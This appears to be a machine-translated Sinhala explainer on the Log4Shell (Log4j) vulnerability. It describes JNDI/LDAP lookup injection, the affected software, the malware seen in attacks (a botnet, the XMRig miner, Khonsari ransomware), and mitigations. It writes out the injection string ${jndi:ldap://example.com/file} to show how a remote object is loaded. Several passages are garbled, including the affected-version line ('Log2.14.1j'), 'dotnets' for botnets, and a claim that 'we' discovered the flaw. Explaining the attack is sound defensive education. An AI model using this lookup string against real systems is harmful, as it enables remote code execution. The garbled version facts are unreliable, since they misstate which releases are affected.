පටුන[සඟවන්න][පෙන්වන්න]
2021 නොවැම්බර් අගදී, අපි සයිබර් ආරක්ෂාවට විශාල තර්ජනයක් අනාවරණය කර ගත්තෙමු. මෙම සූරාකෑම ලොව පුරා පරිගණක පද්ධති මිලියන ගණනකට බලපෑ හැකිය.
මෙය Log4j අනාරක්ෂිතභාවය පිළිබඳ මග පෙන්වීමක් වන අතර නොසලකා හරින ලද සැලසුම් දෝෂයක් ලෝකයේ පරිගණක සේවාවලින් 90%කට වඩා ප්රහාරයට විවෘත වන්නේ කෙසේද යන්නයි.
Apache Log4j යනු Apache Software Foundation විසින් වැඩි දියුණු කරන ලද විවෘත මූලාශ්ර ජාවා මත පදනම් වූ logging උපයෝගීතාවයකි. මුලින් ලියා ඇත්තේ 2001 දී Ceki Gülcü විසිනි, එය දැන් Apache Software Foundation හි ව්යාපෘතියක් වන Apache Logging Services හි කොටසකි.
ලොව පුරා සමාගම් ඔවුන්ගේ යෙදුම් ලොග් වීම සක්රීය කිරීමට Log4j පුස්තකාලය භාවිතා කරයි. ඇත්ත වශයෙන්ම, ජාවා පුස්තකාලය ඉතා සර්වසම්පූර්ණයි, ඔබට එය ඇමේසන්, මයික්රොසොෆ්ට්, ගූගල් සහ තවත් බොහෝ යෙදුම් වලින් සොයාගත හැකිය.
පුස්තකාලයේ ප්රමුඛත්වය යනු කේතයේ ඇති විය හැකි කිසියම් දෝෂයක් මිලියන ගණනක් පරිගණක අනවසරයෙන් ඇතුළු විය හැකි බවයි. 24 නොවැම්බර් 2021 වැනි දින, ඒ වලාකුළු ආරක්ෂාව Alibaba හි සේවය කරන පර්යේෂකයෙකු දරුණු දෝෂයක් සොයා ගත්තේය.
Log4j දුර්වලතාවය, Log4Shell ලෙසද හැඳින්වේ, 2013 සිට නොදැනුවත්වම පැවතුනි. මෙම අවදානම Log4j ධාවනය වන බලපෑමට ලක් වූ පද්ධතිවල කේතය ධාවනය කිරීමට අනිෂ්ට ක්රියාකාරීන්ට ඉඩ ලබා දුන්නේය. එය 9 දෙසැම්බර් 2021 වැනි දින ප්රසිද්ධියේ හෙළි කරන ලදී
කර්මාන්ත විශේෂඥයින් Log4Shell දෝෂය ලෙස හඳුන්වයි මෑත මතකයේ ඇති විශාලතම අවදානම.
අවදානම ප්රකාශයට පත් කිරීමෙන් පසු සතිය තුළ, සයිබර් ආරක්ෂණ කණ්ඩායම් මිලියන ගණනක් ප්රහාර අනාවරණය කර ගත්හ. සමහර පර්යේෂකයන් විනාඩියකට ප්රහාර සියයකට වඩා වැඩි වේගයක් පවා නිරීක්ෂණය කළහ.
එය ක්රියාත්මක වන්නේ කෙසේද?
Log4Shell මෙතරම් භයානක වන්නේ මන්දැයි තේරුම් ගැනීමට, එහි හැකියාව කුමක්දැයි අප තේරුම් ගත යුතුය.
Log4Shell දුර්වලතාවය අත්තනෝමතික කේත ක්රියාත්මක කිරීමට ඉඩ සලසයි, එයින් මූලික වශයෙන් අදහස් කරන්නේ ප්රහාරකයෙකුට ඉලක්ක යන්ත්රයක් මත ඕනෑම විධානයක් හෝ කේතයක් ක්රියාත්මක කළ හැකි බවයි.
එය මෙය ඉටු කරන්නේ කෙසේද?
පළමුව, අපි JNDI යනු කුමක්දැයි තේරුම් ගත යුතුය.
ජාවා නම් කිරීම සහ නාමාවලි අතුරුමුහුණත (JNDI) යනු ජාවා වැඩසටහන් වලට නමක් හරහා දත්ත සහ සම්පත් සොයා ගැනීමට සහ සෙවීමට ඉඩ සලසන ජාවා සේවාවකි. යෙදුම් නිර්මාණය කිරීමේදී සංවර්ධකයින්ට පහසුවෙන් යොමු කිරීමට සංවිධිත වාර්තා කට්ටලයක් සපයන බැවින් මෙම නාමාවලි සේවා වැදගත් වේ.
JNDI හට යම් නාමාවලියකට ප්රවේශ වීමට විවිධ ප්රොටෝකෝල භාවිතා කළ හැක. මෙම ප්රොටෝකෝලවලින් එකක් වන්නේ සැහැල්ලු නාමාවලි ප්රවේශ ප්රොටෝකෝලය හෝ LDAP ය.
තන්තුවක් ලොග් කරන විට, ලොග්4j පෝරමයේ ප්රකාශන හමු වූ විට තන්තු ආදේශන සිදු කරයි ${prefix:name}
.
උදාහරණ වශයෙන්, Text: ${java:version}
පෙළ ලෙස ලොග් විය හැක: Java අනුවාදය 1.8.0_65. මේ ආකාරයේ ආදේශන සාමාන්ය දෙයක්.
වැනි ප්රකාශනද අපට තිබිය හැක Text: ${jndi:ldap://example.com/file}
LDAP ප්රොටෝකෝලය හරහා URL එකකින් ජාවා වස්තුවක් පැටවීමට JNDI පද්ධතිය භාවිතා කරයි.
මෙමගින් එම URL එකෙන් එන දත්ත යන්ත්රය තුලට ඵලදායි ලෙස පූරණය කරයි. ඕනෑම විභව හැකර්වරයෙකුට පොදු URL එකක අනිෂ්ට කේත සංග්රහ කළ හැකි අතර Log4j භාවිතා කරන යන්ත්ර එය ලොග් වන තෙක් රැඳී සිටින්න.
ලොග් පණිවිඩවල අන්තර්ගතයේ පරිශීලක-පාලිත දත්ත අඩංගු වන බැවින්, හැකර්වරුන්ට ඔවුන් පාලනය කරන LDAP සේවාදායකයන් වෙත යොමු වන ඔවුන්ගේම JNDI යොමු ඇතුළත් කළ හැක. මෙම LDAP සේවාදායකයන් JNDI හට අවදානම හරහා ක්රියාත්මක කළ හැකි අනිෂ්ට ජාවා වස්තූන්ගෙන් පිරී තිබිය හැක.
මෙය වඩාත් නරක අතට හැරෙන දෙය නම් යෙදුම සේවාදායක පැත්තක් හෝ සේවාදායක පාර්ශවීය යෙදුමක් නම් එය වැදගත් නොවේ.
ප්රහාරකයාගේ අනිෂ්ට කේතය කියවීමට ලොගර් හට මාර්ගයක් ඇති තාක්, යෙදුම තවමත් සූරාකෑමට විවෘතය.
පීඩාවට පත් වන්නේ කාටද?
4 දක්වා සහ ඇතුළුව අනුවාද 2.0 සමඟ APache Log2.14.1j භාවිතා කරන සියලුම පද්ධති සහ සේවාවන්ට මෙම අවදානම බලපායි.
ජාවා භාවිතා කරන යෙදුම් ගණනාවකට මෙම අවදානම බලපෑ හැකි බව ආරක්ෂක විශේෂඥයින් කිහිප දෙනෙකු උපදෙස් දෙයි.
මයික්රොසොෆ්ට් සතු Minecraft වීඩියෝ ක්රීඩාවේ දෝෂය මුලින්ම සොයා ගන්නා ලදී. ඕනෑම අවදානමක් වැලැක්වීම සඳහා ඔවුන්ගේ ජාවා සංස්කරණ Minecraft මෘදුකාංගය උත්ශ්රේණි කරන ලෙස මයික්රොසොෆ්ට් ඔවුන්ගේ පරිශීලකයින්ගෙන් ඉල්ලා ඇත.
Cybersecurity and Infrastructure Security Agency (CISA) හි අධ්යක්ෂ Jen Easterly පවසන්නේ විකුණුම්කරුවන්ට ප්රධාන වගකීම මෙම අවධානම ප්රයෝජනයට ගන්නා ද්වේශසහගත ක්රියාකාරීන්ගෙන් අවසාන පරිශීලකයන් වැලැක්වීමට.
"ඔවුන්ගේ නිෂ්පාදනයේ මෙම අවදානමක් ඇති බව අවසාන පරිශීලකයින් දැන ගැනීම සහතික කිරීම සඳහා විකුණුම්කරුවන් ඔවුන්ගේ ගනුදෙනුකරුවන් සමඟ සන්නිවේදනය කළ යුතු අතර මෘදුකාංග යාවත්කාලීන කිරීම්වලට ප්රමුඛත්වය දිය යුතුය."
ප්රහාර දැනටමත් ආරම්භ වී ඇති බව වාර්තා වේ. සයිබර් ආරක්ෂණ මෘදුකාංග සපයන සමාගමක් වන Symantec, විවිධ ප්රහාර ඉල්ලීම් ගණනාවක් නිරීක්ෂණය කර ඇත.
පර්යේෂකයන් විසින් අනාවරණය කරගත් ප්රහාර වර්ග සඳහා උදාහරණ කිහිපයක් මෙන්න:
- ඩොට්නෙට්ස්
බොට්නෙට් යනු තනි ප්රහාරක පාර්ශවයක පාලනය යටතේ පවතින පරිගණක ජාලයකි. ඔවුන් DDoS ප්රහාර, දත්ත සොරකම් කිරීම සහ වෙනත් වංචා සිදු කිරීමට උදවු කරයි. පර්යේෂකයන් විසින් Log4j සූරාකෑමෙන් බාගත කරන ලද shell scripts හි Muhstik botnet නිරීක්ෂණය කරන ලදී.
- XMRig Miner Trojan
XMRig යනු Monero ටෝකනය පතල් කිරීමට CPU භාවිතා කරන විවෘත මූලාශ්ර ගුප්ත ව්යවහාර මුදල් පතල්කරුවෙකි. සයිබර් අපරාධකරුවන්ට පුද්ගලයන්ගේ උපාංග මත XMRig ස්ථාපනය කළ හැකි අතර එමඟින් ඔවුන්ගේ අනුදැනුමකින් තොරව ඔවුන්ගේ සැකසුම් බලය භාවිත කළ හැකිය.
- Khonsari Ransomware
Ransomware යනු නිර්මාණය කර ඇති අනිෂ්ට මෘදුකාංග ආකාරයකි ගොනු සංකේතනය කරන්න පරිගණකයක් මත. ප්රහාරකයන්ට පසුව සංකේතනය කළ ගොනු වෙත ප්රවේශය ලබා දීම සඳහා ගෙවීමක් ඉල්ලා සිටිය හැක. පර්යේෂකයන් විසින් Log4Shell ප්රහාර වලින් Khonsari ransomware සොයා ගන්නා ලදී. ඔවුන් වින්ඩෝස් සර්වර් ඉලක්ක කර .NET රාමුව භාවිතා කරයි.
ඊළඟට සිදු වන්නේ කුමක්ද?
විශේෂඥයන් අනාවැකි පළ කරන්නේ Log4J අවදානම නිසා ඇති වූ අවුල් සහගත තත්ත්වය සම්පූර්ණයෙන් නිවැරදි කිරීමට මාස හෝ සමහර විට වසර ගණනාවක් ගත විය හැකි බවයි.
මෙම ක්රියාවලියට බලපෑමට ලක් වූ සෑම පද්ධතියක්ම පැච් කරන ලද අනුවාදයක් සමඟ යාවත්කාලීන කිරීම ඇතුළත් වේ. මෙම සියලුම පද්ධති පැච් කර ඇතත්, ප්රහාරය සඳහා සේවාදායකයන් විවෘතව ඇති කවුළුවට හැකර්වරුන් දැනටමත් එකතු කර ඇති පිටුපස දොරේ තර්ජනය තවමත් පවතී.
බොහෝ විසඳුම් සහ අවම කිරීම් මෙම දෝෂය මගින් යෙදුම් සූරාකෑම වැළැක්වීම සඳහා පවතී. නව Log4j අනුවාදය 2.15.0-rc1 මෙම අවදානම අවම කිරීම සඳහා විවිධ සැකසුම් වෙනස් කළේය.
JNDI භාවිතා කරන සියලුම විශේෂාංග පෙරනිමියෙන් අබල කරනු ඇති අතර දුරස්ථ බැලීම් ද සීමා කර ඇත. ඔබගේ Log4j සැකසුමෙහි සෙවීම් විශේෂාංගය අක්රිය කිරීම සිදුවිය හැකි සූරාකෑම් අවදානම අඩු කිරීමට උපකාරී වේ.
Log4j පිටතින්, විවෘත මූලාශ්ර සූරාකෑම් වැළැක්වීම සඳහා පුළුල් සැලැස්මක අවශ්යතාවය තවමත් පවතී.
මීට පෙර මැයි මාසයේදී ධවල මන්දිරය විසින් නිකුත් කරන ලදී විධායක නියෝගයක් ජාතික සයිබර් ආරක්ෂාව වැඩි දියුණු කිරීම අරමුණු කරගත්. එයට මෘදුකාංග බිල්පතක් (SBOM) සඳහා ප්රතිපාදන ඇතුළත් විය, එය යෙදුම ගොඩනැගීමට අවශ්ය සෑම අයිතමයකම ලැයිස්තුවක් අඩංගු විධිමත් ලේඛනයක් විය.
වැනි කොටස් මෙයට ඇතුළත් වේ විවෘත කේතයකි සංවර්ධනය සඳහා භාවිතා කරන පැකේජ, පරායත්තතා සහ API. SBOMs පිළිබඳ අදහස විනිවිදභාවය සඳහා උපකාරී වන නමුත්, එය සැබවින්ම පාරිභෝගිකයාට උපකාර කරයිද?
පරායත්තතා උත්ශ්රේණි කිරීම කරදරයක් විය හැක. විකල්ප පැකේජ සොයා ගැනීම සඳහා අමතර කාලය නාස්ති කිරීමේ අවදානමට වඩා සමාගම්වලට ඕනෑම දඩ මුදලක් ගෙවීමට තෝරා ගත හැකිය. සමහර විට මෙම SBOMs ප්රයෝජනවත් වන්නේ ඒවා නම් පමණි විෂය පථය තව දුරටත් සීමා වේ.
නිගමනය
Log4j ගැටළුව ආයතන සඳහා තාක්ෂණික ගැටලුවකට වඩා වැඩි ය.
ව්යාපාරික නායකයින් තම සේවාදායකයන්, නිෂ්පාදන හෝ සේවාවන් තමන් විසින්ම නඩත්තු නොකරන කේතයක් මත රඳා පවතින විට සිදුවිය හැකි අවදානම් පිළිබඳව දැනුවත් විය යුතුය.
විවෘත මූලාශ්ර සහ තෙවන පාර්ශවීය යෙදුම් මත යැපීම සෑම විටම යම් අවදානමක් සමඟ පැමිණේ. නව තර්ජන මතුවීමට පෙර සමාගම් අවදානම් අවම කිරීමේ උපාය මාර්ග සකස් කිරීම ගැන සලකා බැලිය යුතුය.
බොහෝ වෙබය ලොව පුරා ස්වේච්ඡා සේවකයන් දහස් ගණනක් විසින් පවත්වාගෙන යනු ලබන විවෘත මූලාශ්ර මෘදුකාංග මත රඳා පවතී.
අපට වෙබය ආරක්ෂිත ස්ථානයක් තබා ගැනීමට අවශ්ය නම්, විවෘත මූලාශ්ර ප්රයත්නයන් සහ සයිබර් ආරක්ෂණ ආයතන සඳහා අරමුදල් සැපයීම සඳහා රජයන් සහ සංගත ආයෝජනය කළ යුතුය. සීඅයිඑස්ඒ.
ඔබමයි